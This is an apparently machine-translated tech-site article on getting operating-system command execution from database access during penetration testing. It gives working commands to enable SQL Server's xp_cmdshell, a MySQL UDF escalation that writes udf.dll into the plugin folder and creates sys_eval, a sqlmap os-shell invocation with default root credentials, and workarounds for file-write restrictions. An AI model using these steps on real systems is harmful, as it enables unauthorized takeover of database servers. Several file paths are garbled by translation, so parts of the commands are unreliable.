Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to analyze the command execution of the database system. The content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Preface

There are two main types of database utilization in infiltration:

The first is the sql injection vulnerability, which can be directly getshell with the absolute path of the website.

The second kind of database weak password, such as phpmyadmin weak password, database connection weak password.

In my initial time, the use of database weak password and sql injection is the same, both under the authority of dba, with the absolute path of the website to write shell. Because the absolute path is not always found, it is common to log in to the database but not get the shell.

Sql server executes system commands

It is relatively simple for sql server to execute system commands, using xp_cmdshell components directly

Open the cmdshell component.

Exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure' xp_cmdshell',1;reconfigure

Execute a command

Exec master.dbo.xp_cmdshell 'whoami'

This is why the sql server injection point returns directly to the command line for execution when using sqlmap for os-shell.

Mysql executes system commands

Mysql execution system commands are suitable for directly connecting to the database, and the sql-shell of sqlmap is also feasible in theory, but there are great restrictions on the type of injection points, execution statements and statement length of SQL in practical use.

The target aircraft ip:172.16.86.161 root/root

Idea: use udf to raise rights and upload udf.dll files.

The first choice is to determine the version number of mysql and the installation directory.

Select @ @ version; View mysql version

Select @ @ basedir; View mysql installation path

The storage location of udf.dll is divided into two cases.

1. The Mysql version is greater than 5.1.

The udf.dll file must be placed in the lib\ plugin folder of the MySQL installation directory.

2. The Mysql version is less than 5.1:

For win 2000 server, you need to import the udf.dll file to C:\ Winnt\ udf.dll.

Win2003 server, to export the udf.dll file under C:\ Windows\ udf.dll.

The mysql version number of the target is 5.5.62 and greater than 5.1, so put the udf.dll file in the lib\ plugin folder of the MySQL installation directory.

The udf.dll file is included in sqlmap and is placed in data/udf. The file cannot be used directly after XOR encoding. You can use the cloak.py file in the sqlmap/extra/cloak directory to decode it.

After preparing the udf.dll file, the next step is to write the file to the specified directory. I experimented with three write methods.

Into outfile write directly

Use notepad++ to open the udf file.

The copied content is hexadecimal encoded.

Execute in the database:

Select hexadecimal Encoding into outfile 'C:/Program Files/MySQL/MySQL Server 5.5 Universe plugin DUF. Dll'

Create sys_eval

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'

System execution permission was successfully obtained.

Select sys_eval ('')

Table contents export write

Create a table to store hexadecimal content.

Set @ my_udf=concat ('', hexadecimal of dll); create table udf_data (data LONGBLOB)

Insert the contents of my_udf into the table udf_data.

Insert into udf_data values (""); update udf_data set data = @ my_udf

Export the content to a file.

Select data from udf_data into DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.5 max libamp plugin DLL'

Create the sys_eval and execute the system command successfully.

Create function sys_eval returns string soname 'udf.dll';select sys_eval (' whoami')

Delete after use

Drop function sys_eval;sqlmap write

Sqlmap comes with the udf function.

Sqlmap.py-d "mysql://root:root@172.16.86.161:3306/mysql"-os-shell

Directly os-shell executes system commands.

Pit spot

1. The plugin folder under the mysql lib directory may not exist in practice. You need to create it manually, and you can use NTFS data streams to create it, but the success rate is low.

Select 'test' into dumpfile D:\\ MySQL\\ lib\\ plugin::$INDEX_ALLOCATION'

2. A higher version of mysql will have a secure-file-priv parameter limit, which requires changing the configuration of the database my.ini file and restarting the database.

Secure_file_priv= "" on how to analyze the database system command execution is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.